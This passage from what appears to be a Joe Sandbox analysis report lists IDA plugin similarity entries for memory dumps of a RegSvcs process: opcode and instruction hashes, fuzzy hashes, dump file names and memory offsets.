                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7e566873df6305dd6d6f5c417ada7a140b554e127d2eee5834f4af27cb6f5c08
                                                        • Instruction ID: 6e5ab61bcdcbb4473462789eab4ae632775bbd2315dc228d3a80f7684b764431
                                                        • Opcode Fuzzy Hash: 7e566873df6305dd6d6f5c417ada7a140b554e127d2eee5834f4af27cb6f5c08
                                                        • Instruction Fuzzy Hash: 18F0903210E7D55FD3039FBC99A84C93FB0ED5B21471A04DBD181CF167D521A849CB96
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d3a76aece74ae670c2402c4b3a2a1abe45baeebdec0f26e0791a0e8d2f15f5ab
                                                        • Instruction ID: f212b641b958cfbfe5fdbd674ffde59fcb79a8d8b7a753d87e1ae246c2f541b9
                                                        • Opcode Fuzzy Hash: d3a76aece74ae670c2402c4b3a2a1abe45baeebdec0f26e0791a0e8d2f15f5ab
                                                        • Instruction Fuzzy Hash: 8EF0A4347107149BD754EBA494603AE77E2EBC4624F504919D6066B380CFB95D0A4BCA
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a9a0aa509cd3e63dbca0149a63b292fbb71e77c6d49858fd41dc6807cf35818d
                                                        • Instruction ID: 4688e63451ca3606e4fe3eb9237478ede419ff97fa33341b9d0c5013791f5383
                                                        • Opcode Fuzzy Hash: a9a0aa509cd3e63dbca0149a63b292fbb71e77c6d49858fd41dc6807cf35818d
                                                        • Instruction Fuzzy Hash: 900131321081987FCF429F94CC11CFA7FBAEF4D251B088186FD9486162C236D862EB60
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 18da93e70296c5a80f3e2fdece91824c599eccf495d2971598dc28a9fc4c8321
                                                        • Instruction ID: ed1c0837d7f8a49f0979c903754d558585258d7fabcac5a468c05e14276faef1
                                                        • Opcode Fuzzy Hash: 18da93e70296c5a80f3e2fdece91824c599eccf495d2971598dc28a9fc4c8321
                                                        • Instruction Fuzzy Hash: D8F0F6353141405FC205DB69E9A4D6BBFEAEFCC310B544036F60ACB395CE299C06CBA1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 44cab5f399d17318c77e842af35e54553f1ffc37469aabf9ccfdde8e554c1e04
                                                        • Instruction ID: d2702b3f2ee0f1471d547c25508242cc84a5d7ab4978f79b6454c032205e1a6a
                                                        • Opcode Fuzzy Hash: 44cab5f399d17318c77e842af35e54553f1ffc37469aabf9ccfdde8e554c1e04
                                                        • Instruction Fuzzy Hash: 94F02431305781AFC7015F9AA89886BBF6AFF8A220704807AEE468B350CE314C15C361
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3799910397.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_12ad000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 28a8d58aa944ecd65b116de6ab8bfe8d3b1296a8ee398ec45654871552e4689e
                                                        • Instruction ID: 8fcec166b68e578a9fd72c8762f1995d6e71db578a5edcce50c25e46438eb853
                                                        • Opcode Fuzzy Hash: 28a8d58aa944ecd65b116de6ab8bfe8d3b1296a8ee398ec45654871552e4689e
                                                        • Instruction Fuzzy Hash: CDF062714083449FE7208A1ADD84B62FF98EB41734F18C55AEE5C4F697C3799844CAB1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 577b7462b6de309f5cf40a17248f92f57b54a4a5f783378256531ac89f8e8182
                                                        • Instruction ID: dc698b626cae4478e48d7fb81194ed9600b0a9b9aea3f9bec294ca023d3f572d
                                                        • Opcode Fuzzy Hash: 577b7462b6de309f5cf40a17248f92f57b54a4a5f783378256531ac89f8e8182
                                                        • Instruction Fuzzy Hash: 55F0FC35304651CFDB355E28991476A7792FB84214F24447BDA05973E0EB75AC01C761
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 271695b1315cf4042637f016a30b9b76e0b3b52f39e2b166610cd29375fffcaf
                                                        • Instruction ID: ba31fb0ebd7d9fb8c54fa3d0d5caef16f92503fdb355c39f04a7cad97d6480ee
                                                        • Opcode Fuzzy Hash: 271695b1315cf4042637f016a30b9b76e0b3b52f39e2b166610cd29375fffcaf
                                                        • Instruction Fuzzy Hash: D5F0B4363002106FD7549E09E885EAB77AEFBC8220B608025F50997744CE3A9C068791
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 67eaa8cd28a6264cbdb3476f922c4f9c941421d663bcbe07862a5504a11a3bf8
                                                        • Instruction ID: 11dfd214fa2b1e85bfb281dee71e175e43c533e3cafb4d943ef5879af3a3af6a
                                                        • Opcode Fuzzy Hash: 67eaa8cd28a6264cbdb3476f922c4f9c941421d663bcbe07862a5504a11a3bf8
                                                        • Instruction Fuzzy Hash: 99F027313043504FDB225A2C9C05BA73BB5DBCA618F2840AAE244DB391CAA5DC03C711
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6439ba1358019dd79a7472b13d616815ea7e08579f86ea1db6f495eb4a1d0729
                                                        • Instruction ID: 94fa1388f464621708fd0f370317759a826e737eb88d80c052ddf1dc0cbefae2
                                                        • Opcode Fuzzy Hash: 6439ba1358019dd79a7472b13d616815ea7e08579f86ea1db6f495eb4a1d0729
                                                        • Instruction Fuzzy Hash: 7AF09035A00919CFD756DA29E448BA172F7BB88718F0D81F2D50B8766ADB70BC8287D4
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 95f530794faef1b45536c190c9b0e189c89969f2225f27f224bdc4c74dc948d1
                                                        • Instruction ID: e21388c155de6f086fe1358f3ea75cfd92c7a78807135bf707f665edbe74aad6
                                                        • Opcode Fuzzy Hash: 95f530794faef1b45536c190c9b0e189c89969f2225f27f224bdc4c74dc948d1
                                                        • Instruction Fuzzy Hash: 47F082753140015BC214EB69E594D6BBBDAEFCC310B504039F20EC7365CE799C028B91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 103ecbb7990515d2509f177e3b43bd5e5fe1bd7dd573cd76402bc5550c67b31f
                                                        • Instruction ID: 2edc96f7ef641391e334fde6026984ee5707a3338f8bec1fc58090717cee5eb5
                                                        • Opcode Fuzzy Hash: 103ecbb7990515d2509f177e3b43bd5e5fe1bd7dd573cd76402bc5550c67b31f
                                                        • Instruction Fuzzy Hash: 9DF0BB3050521DAFC705EF74E8655ED7BF4FF4211471001D6C004DB261DD352D08CB95
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fb1ad426f99f784dbea7bf9cb69b99ea318a302aa84dc34a8b0e92a2429831a0
                                                        • Instruction ID: 22fb2a8fe522116112aa628765031cd44d39986e374ad1edbbb07dc775260f37
                                                        • Opcode Fuzzy Hash: fb1ad426f99f784dbea7bf9cb69b99ea318a302aa84dc34a8b0e92a2429831a0
                                                        • Instruction Fuzzy Hash: EFF08C731041986FCB818E84CC01AFA3FADEB4D261F088146FD98D2641C936D922ABA0
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0f321c6038c9ea598a48b6181b859bb9a61fac6fd93fa90b38c35c92b3ceebd6
                                                        • Instruction ID: bc0c915ef32781d4dda147d968d90aead702ec3a854a3b7df5cb4fb10a00edf7
                                                        • Opcode Fuzzy Hash: 0f321c6038c9ea598a48b6181b859bb9a61fac6fd93fa90b38c35c92b3ceebd6
                                                        • Instruction Fuzzy Hash: 31F02B3134031457CF219A5DAC00B2B33EADBC5618F30446AE309DB3D0DEE5DC028765
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f6c26930d31ea8e3dcd9f9d0fd6a7efeb2c74ef20effbaa7e2c6d6969ec2aec6
                                                        • Instruction ID: 588dcb804e67883be212109e94a76cde7d371d0c8dd388380c7c088628c4e632
                                                        • Opcode Fuzzy Hash: f6c26930d31ea8e3dcd9f9d0fd6a7efeb2c74ef20effbaa7e2c6d6969ec2aec6
                                                        • Instruction Fuzzy Hash: 77E02B323043246FD300AA2ADCD1A96BFEEEFC5160B048077D508CB352EEA5DC0483E8
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 642f8a17f3d269a84e512b4b1d1763dfdcf2f8d839c0a559f9a9c5a4a39a52b3
                                                        • Instruction ID: 372d695866476b0de5f15b6eb8e88851106bb770a965d988b976250ce407f95f
                                                        • Opcode Fuzzy Hash: 642f8a17f3d269a84e512b4b1d1763dfdcf2f8d839c0a559f9a9c5a4a39a52b3
                                                        • Instruction Fuzzy Hash: 0EE0E5332082482FC7118E90EC429F37B2DDB46121B088487FC048B792C522DC11C7E1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 92864c413d733fdaf913b48460dc1bc422c69012e6ebe608207cb80bc783199b
                                                        • Instruction ID: 0ccf8328694d57674869e3fdb4360073a731d1b4025400c27dd5957b6e28aefe
                                                        • Opcode Fuzzy Hash: 92864c413d733fdaf913b48460dc1bc422c69012e6ebe608207cb80bc783199b
                                                        • Instruction Fuzzy Hash: E4E06D36744110AFDB519A48E444BAAB792FF88370F15C026EA099B741C635E8018BA1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cc1a6004cf8a3e840ef5262894a2317ced1a0c123e46aa6766796bd62d88da5f
                                                        • Instruction ID: 10e933bef3e5183e294148c9f17348e9927c7ef8e3646a68df10294a97d5a9d3
                                                        • Opcode Fuzzy Hash: cc1a6004cf8a3e840ef5262894a2317ced1a0c123e46aa6766796bd62d88da5f
                                                        • Instruction Fuzzy Hash: AEF0E572A052499FC701DFE8B4485DFBFF8DB8B21130141EBD145CB613EA704916A792
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 30472103861902b553d1fc18ca8f052ed13c287de990a5b47a2d993397531420
                                                        • Instruction ID: fa4e00c1bf581f1bc04d645c2c2f2750026e8f2964283f11044b3023bf805eee
                                                        • Opcode Fuzzy Hash: 30472103861902b553d1fc18ca8f052ed13c287de990a5b47a2d993397531420
                                                        • Instruction Fuzzy Hash: 19F06736105144EFCB468F84D940DA5BF76FF8922431AC4EAE6188F573C633C926EB51
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bb7b30a25366a0002587f992a9bd72ea901be57835a0d6e9571582739d2a05a8
                                                        • Instruction ID: 08f4ad28ef73580f3f74de3025af17f864ee9dd806c98f626a864cbce2f85e38
                                                        • Opcode Fuzzy Hash: bb7b30a25366a0002587f992a9bd72ea901be57835a0d6e9571582739d2a05a8
                                                        • Instruction Fuzzy Hash: 1EF0D43210419CBF8F429E95CC10CFA7FAAEF4D254B088086FEA492161C676D961EBA0
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: beaf1d867f47284014868e07402c8ef466e2577b11e54e8407c49750c74db547
                                                        • Instruction ID: 0d0f712cf285e0086498c2c52dca37a9baee879ac42cbbbde5d68ad39fd63d85
                                                        • Opcode Fuzzy Hash: beaf1d867f47284014868e07402c8ef466e2577b11e54e8407c49750c74db547
                                                        • Instruction Fuzzy Hash: 3EF0EC326012049BCB94CA9CE986BDEF7F0EF89218F1485BAD458D7B50EA31DE01D781
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 26cd21bf446b23bb9cb9cf42d7aa1c571148d75e2bb5fa5f4504cbdc9ee08cba
                                                        • Instruction ID: 9e9bf7327632be584faab354dbb17fadb0aec4762865a63a0034c6fc7e53fee4
                                                        • Opcode Fuzzy Hash: 26cd21bf446b23bb9cb9cf42d7aa1c571148d75e2bb5fa5f4504cbdc9ee08cba
                                                        • Instruction Fuzzy Hash: E3F065357006146F9755EE49E944C6B7B9FFBCC3207608039F60A97744CE769C058BA1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4f5a60413181116fc61418de3eba1e191becc86bad717d756976643b6c5ce4da
                                                        • Instruction ID: 5b4253df8f3a150a42eb448b2976a8fcb42e8c02530ee3f2a816b3b02d24ffc2
                                                        • Opcode Fuzzy Hash: 4f5a60413181116fc61418de3eba1e191becc86bad717d756976643b6c5ce4da
                                                        • Instruction Fuzzy Hash: 3DF0A732204155ABCB019F5DF80089B7F66EB89310B048066FA45D7662CB764C1197A1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 60804a09cdde2819334de5e6a5e16f0edf038e8e492099c2cbf4a3f59c6fe01a
                                                        • Instruction ID: 009b00a584d2fd6d4754397822fc66a772ba931b61754fdb3346d0b0556d619a
                                                        • Opcode Fuzzy Hash: 60804a09cdde2819334de5e6a5e16f0edf038e8e492099c2cbf4a3f59c6fe01a
                                                        • Instruction Fuzzy Hash: D6F0EC32808618CFC7639A74A8082D13BE6AB86368F0E02F2C04A8311AD230788183D6
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 138e3717cd49e2a778171270fa87c64d0f2cf6155fa50fd0030c21fd5c117e81
                                                        • Instruction ID: adff5b239be2a4f0f2695d75a138ef5952470d859163dffc42a0254418f0bc25
                                                        • Opcode Fuzzy Hash: 138e3717cd49e2a778171270fa87c64d0f2cf6155fa50fd0030c21fd5c117e81
                                                        • Instruction Fuzzy Hash: F8F0903051424C9FCF02AFA8D8108E9BFB4EF46204B09C69AE88497212EB31D850CB91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4ae692074fe194ee636196510c3502aeff4bb249d5eac0769fba0c04dc469730
                                                        • Instruction ID: ff81fe52264f2de64ebdbb653aec99bb99fa3b58fe7c9e6036d4cf1d58714ec3
                                                        • Opcode Fuzzy Hash: 4ae692074fe194ee636196510c3502aeff4bb249d5eac0769fba0c04dc469730
                                                        • Instruction Fuzzy Hash: F3F0A032608204AFD744DE98E841AEAB7F9FB89220F14849EE40493240DE328D029791
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dfb81a8bc0dd3c2285d1fdc6ed30551d5208ce30d9e089c4231a61625762066c
                                                        • Instruction ID: 97f47f8d5d153929125eefff1bd94ba66e799b42d870e5f167d85e9dbfe99abc
                                                        • Opcode Fuzzy Hash: dfb81a8bc0dd3c2285d1fdc6ed30551d5208ce30d9e089c4231a61625762066c
                                                        • Instruction Fuzzy Hash: 4DF012721041D46FDB068F90CD518FA7FB5EF49224709818BFD9496151C535D932DB60
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 83481642e93a1c5d5278b7aa9a9ea9a7f6065abcc16f0d6452fa38246250004b
                                                        • Instruction ID: b6cd8047317992f38e7743d7b00303301163d62f6cebc6ac0e71f57d03cee341
                                                        • Opcode Fuzzy Hash: 83481642e93a1c5d5278b7aa9a9ea9a7f6065abcc16f0d6452fa38246250004b
                                                        • Instruction Fuzzy Hash: D2F039721440A86FDB418E99DC11EF77FACDB5D221B18804AFDA4C6281C569D962ABB0
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a014805d7692310cb667d7c54701249853418d40f1306e9d6cf2a7b25797abe5
                                                        • Instruction ID: 9a98403f7780cc20b52465e41cac3c216a78c95cdf13e8b9d9e10a0c64ffd0d8
                                                        • Opcode Fuzzy Hash: a014805d7692310cb667d7c54701249853418d40f1306e9d6cf2a7b25797abe5
                                                        • Instruction Fuzzy Hash: 35F0B4706042958FE341CB24D504A22BBA6FB85328F18CA89E0994B292CB72DC83CB90
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4cab6f348acbbe845c570cdef76c1248854ee1a285702bc5e0088a29a135cab5
                                                        • Instruction ID: f1aa8f25bc5fd90e5e4b83223e0555db9b79521ec048a0d10c5b7b206ed12ed6
                                                        • Opcode Fuzzy Hash: 4cab6f348acbbe845c570cdef76c1248854ee1a285702bc5e0088a29a135cab5
                                                        • Instruction Fuzzy Hash: 45E0ED32204648ABC7020F8D9800AEABB6AEBCA320F1580B6F641CB240CA605C0283A1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a8c245808aa1affe2f425e0808e7d77210533eca33611e76131319b2e7115d47
                                                        • Instruction ID: cec5f8dd7fe747e93103efa0163bafab2f6308db2562f117ad672ab50668e161
                                                        • Opcode Fuzzy Hash: a8c245808aa1affe2f425e0808e7d77210533eca33611e76131319b2e7115d47
                                                        • Instruction Fuzzy Hash: E6F08C3090524EAFC741EFA8E9A45AD7BF5EF5622471001E9C0089B222EA352E00CB91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: df859f407186c5b09e98f976c4da104b69eea73d343c979b66528d282f3fd403
                                                        • Instruction ID: 4e98ec60ece72306a4d9e7f4dd7bbb1686d07b9d4f5b3ad11910b9697b4be9be
                                                        • Opcode Fuzzy Hash: df859f407186c5b09e98f976c4da104b69eea73d343c979b66528d282f3fd403
                                                        • Instruction Fuzzy Hash: 3EF0C96705E3D04FC3834668DC963E07F719B07164B5E40E3D880CFAA3D51AAD4A9765
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a353796865bfb63b6dd238f7f9a02c54925c010a07de46cc4bfad42375282b57
                                                        • Instruction ID: 879bb30f57f14e46a5b31a281b212e4543672dbb6e4cda2105bc7971c7f6071c
                                                        • Opcode Fuzzy Hash: a353796865bfb63b6dd238f7f9a02c54925c010a07de46cc4bfad42375282b57
                                                        • Instruction Fuzzy Hash: 77E092713513146FD704AB78F858FA93BA6AB89B15F1005A5E900CB3A5DA61DC148BA1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d4c5e48a88ecede231fd060d443ce03eddea53f5c677438e995a15e8b5869b68
                                                        • Instruction ID: 738fcac27c27711804004029e4c54da9b2131d73fe77506a6f1788a2e84cda6a
                                                        • Opcode Fuzzy Hash: d4c5e48a88ecede231fd060d443ce03eddea53f5c677438e995a15e8b5869b68
                                                        • Instruction Fuzzy Hash: 8BE092B3700A495FE701CA18D885A9DBBA1FFD02A4F19C869E449CF225DF70E8078B80
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3fbfb58ee9421cfa1a2804465759943e2b7cfa12affcbf94f78aa498d8e57a69
                                                        • Instruction ID: 8172298f8d0649ccfa46df9a11946f372f3c728f356c8ac835e252f6e018390f
                                                        • Opcode Fuzzy Hash: 3fbfb58ee9421cfa1a2804465759943e2b7cfa12affcbf94f78aa498d8e57a69
                                                        • Instruction Fuzzy Hash: E9E01A37100108BFDF069E84DC02EEA7B6AEB48720F18801AFD0452250CA77D822AB90
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 40b153383e6de520665622cd19abb3d691de445f4deecf93faaa50dfd1b24b64
                                                        • Instruction ID: 704a75d8dcbbdfedf44427af84db028faf61110e9c107736e094e3b967943e86
                                                        • Opcode Fuzzy Hash: 40b153383e6de520665622cd19abb3d691de445f4deecf93faaa50dfd1b24b64
                                                        • Instruction Fuzzy Hash: 81E0ED721041987F8B41CE95CC10CFA7FEDEB4D265B088046FE98D2151C576DD21EBB0
                                                        Memory Dump Source
